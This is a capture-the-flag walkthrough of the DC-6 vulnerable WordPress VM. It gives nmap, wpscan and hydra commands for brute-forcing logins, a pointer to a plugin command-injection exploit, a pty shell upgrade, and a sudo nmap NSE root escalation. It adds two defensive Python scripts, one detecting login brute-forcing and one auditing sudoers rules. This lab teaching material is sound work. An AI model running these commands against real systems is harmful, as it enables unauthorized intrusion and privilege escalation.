Target machine information

DESCRIPTION
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

TECHNICAL INFORMATION
DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.0.142 wordy

NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.

This is VERY important.

And yes, it's another WordPress based VM (although only my second one).

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

CLUE
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years. ;-)

Information gathering

After deploying the target VM, run an nmap ping sweep to find the live hosts: one address is Kali's, the other is the target's. Then scan the target's open ports.

# ping sweep of the hosts in the subnet
nmap -sP 10.0.0.0/24
# scan all TCP ports on the target and detect service versions
nmap -sV -p- 10.0.0.22

Add the hosts entry as the hint instructs:

10.0.0.22 wordy

As in the earlier machines, use wpscan to enumerate users:

wpscan --url http://wordy/ --enumerate u

# users found
admin
graham
mark
jens
sarah

Build the password wordlist from the author's hint, then brute-force the logins:

gzip -d rockyou.txt.gz
cat rockyou.txt | grep k01 > passwords.txt
hydra -L user.dic -P passwords.txt -V -o wordpress.txt wordy http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:login_error'

Brute-force results:

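The brute force above leaves a distinctive trace on the WordPress host: a burst of POST requests to /wp-login.php from one address, each answered with HTTP 200 (WordPress re-renders the login form on failure) and, if a password is guessed, a final 302 redirect. The following Python script is an added example, not part of the original walkthrough, the DC-6 VM or its author's material; it parses Apache combined-format access log lines (constructed inline for the demonstration) and flags such bursts. The threshold, the time window and the sample addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_login_bruteforce(lines, threshold=10, window=timedelta(minutes=5)):
    """Flag source IPs with `threshold` failed wp-login.php POSTs inside `window`.

    A failed WordPress login answers 200 (the form is re-rendered with an error);
    a successful one answers 302 (redirect to wp-admin).  A 302 from an address
    that was just flagged is the signal that a password was guessed.
    """
    events = defaultdict(list)  # ip -> [(timestamp, status), ...]
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != "/wp-login.php":
            continue
        events[rec["ip"]].append((rec["ts"], rec["status"]))

    findings = {}
    for ip, evs in events.items():
        evs.sort()
        failures = [ts for ts, st in evs if st == 200]
        # Sliding window: is there any run of `threshold` failures within `window`?
        burst = any(
            failures[i + threshold - 1] - failures[i] <= window
            for i in range(len(failures) - threshold + 1)
        )
        if not burst:
            continue
        last_failure = failures[-1]
        guessed = any(st == 302 and ts >= last_failure for ts, st in evs)
        findings[ip] = {"failed_attempts": len(failures), "possible_success": guessed}
    return findings


# --- constructed sample log (not captured from the lab) ---------------------
BASE = datetime(2021, 3, 3, 13, 16, 0, tzinfo=timezone.utc)


def make_line(ip, ts, status, path="/wp-login.php", method="POST"):
    # Body size and user agent are filler values.
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} 3512 "-" "Mozilla/5.0"'


SAMPLE_LOG = (
    # 12 rapid failures from one address, then a redirect: a guessed password
    [make_line("10.0.0.10", BASE + timedelta(seconds=i), 200) for i in range(12)]
    + [make_line("10.0.0.10", BASE + timedelta(seconds=12), 302)]
    # one ordinary user logging in once
    + [make_line("10.0.0.5", BASE + timedelta(minutes=1), 302)]
    + [make_line("10.0.0.5", BASE + timedelta(minutes=1, seconds=4), 200, "/wp-admin/", "GET")]
)

if __name__ == "__main__":
    import sys
    # Pass a real access log path as the first argument, or run on the sample.
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, info in find_login_bruteforce(lines).items():
        print(ip, info)
```

Run it against the web server's access log on the WordPress host to see which addresses would have been flagged; pairing the 200-then-302 pattern with a rate limit or fail2ban-style block on /wp-login.php stops this class of attack at the source.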
flag1

After logging in with the recovered account, we find that this plugin can be used to get a shell.

cp /usr/share/exploitdb/exploits/php/webapps/45274.html ./

Reading the HTML file shows a command injection vulnerability; you can capture the request with Burp, or simply use the provided HTML while logged in.

Try a reverse shell:

Upgrade to an interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'

A password turns up in that shell; try logging in over SSH with it.

There is a script that can be run as another user via sudo; editing it lets you switch to the jens account, or spawn a reverse shell from it.

Switch to the jens user:

sudo -u jens ./backups.sh

jens is allowed to run nmap as root, so try privilege escalation through nmap:

echo "os.execute('/bin/bash')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

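Both privilege escalations in this walkthrough rest on sudo rules: one lets graham run a script as jens, the other lets jens run nmap as root, and nmap's --script option executes Lua, which is what the shell.nse step above uses. The Python audit script below is an added example (not from the page, the VM or its author) that parses sudoers-style user specifications and flags the two patterns: commands that can run arbitrary code once elevated, and commands that live outside the system binary directories, especially when the file is writable. The sample sudoers text, the list of shell-capable binaries and the NOPASSWD tags are constructed; the real rules on DC-6 are not reproduced on the page.

```python
import os
import re

# Binaries widely documented as able to run arbitrary code once they execute
# with elevated privileges (nmap runs Lua via --script, editors and pagers have
# shell escapes, interpreters run anything).  Assumed list for this example.
SHELL_CAPABLE = {
    "nmap", "vim", "vi", "less", "more", "find", "awk", "perl",
    "python", "python3", "bash", "sh", "env",
}

# Commands outside these directories are only as trustworthy as the file's
# permissions: a script in /home that the invoking user can edit is a shell.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
               "/usr/local/bin/", "/usr/local/sbin/")

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(
    r"^(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT"
    r"|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Split sudoers-style user specifications into one record per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        # "(user:group)" -> user; no parentheses means the command runs as root
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        for cmd in m.group("cmds").split(","):
            cmd, tags = cmd.strip(), []
            while (t := TAG_RE.match(cmd)) is not None:
                tags.append(t.group(0).rstrip(": \t"))
                cmd = cmd[t.end():]
            rules.append({"user": m.group("user"), "runas": runas,
                          "command": cmd, "tags": tags})
    return rules


def audit_sudoers(text, writable=None):
    """Return the rules that grant more than they appear to."""
    if writable is None:
        # Checks the auditing process's own access, not the rule's user.
        writable = lambda path: os.access(path, os.W_OK)
    findings = []
    for rule in parse_sudoers(text):
        binary = rule["command"].split()[0] if rule["command"] else ""
        name = binary.rsplit("/", 1)[-1]
        issue = None
        if rule["command"] == "ALL":
            issue = "unrestricted command"
        elif name in SHELL_CAPABLE:
            issue = f"{name} can run arbitrary code as {rule['runas']}"
        elif not binary.startswith(SYSTEM_DIRS):
            issue = "command outside system directories"
            if writable(binary):
                issue += " and writable by the invoking user"
        if issue:
            findings.append({**rule, "issue": issue})
    return findings


# Constructed sample modelled on the two rules the walkthrough relies on;
# the real DC-6 sudoers file is not reproduced on the page.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
graham  ALL=(jens) NOPASSWD: /home/jens/backups.sh
jens    ALL=(root) NOPASSWD: /usr/bin/nmap
sarah   ALL=(root) /usr/bin/systemctl restart apache2   # not flagged
"""

if __name__ == "__main__":
    # Pretend the script is writable, as it was for the walkthrough's user.
    for f in audit_sudoers(SAMPLE_SUDOERS, writable=lambda p: p == "/home/jens/backups.sh"):
        print(f"{f['user']:8} -> {f['runas']:6} {f['command']:32} {f['issue']}")
```

On a real host, feed it the output of `sudo -l` reshaped into sudoers syntax or the sudoers files themselves (read as root) and leave `writable` at its default so the file permission check is real. The fix for both findings is the same: point sudo rules at root-owned, non-writable files, and never at binaries that accept scripts or spawn shells.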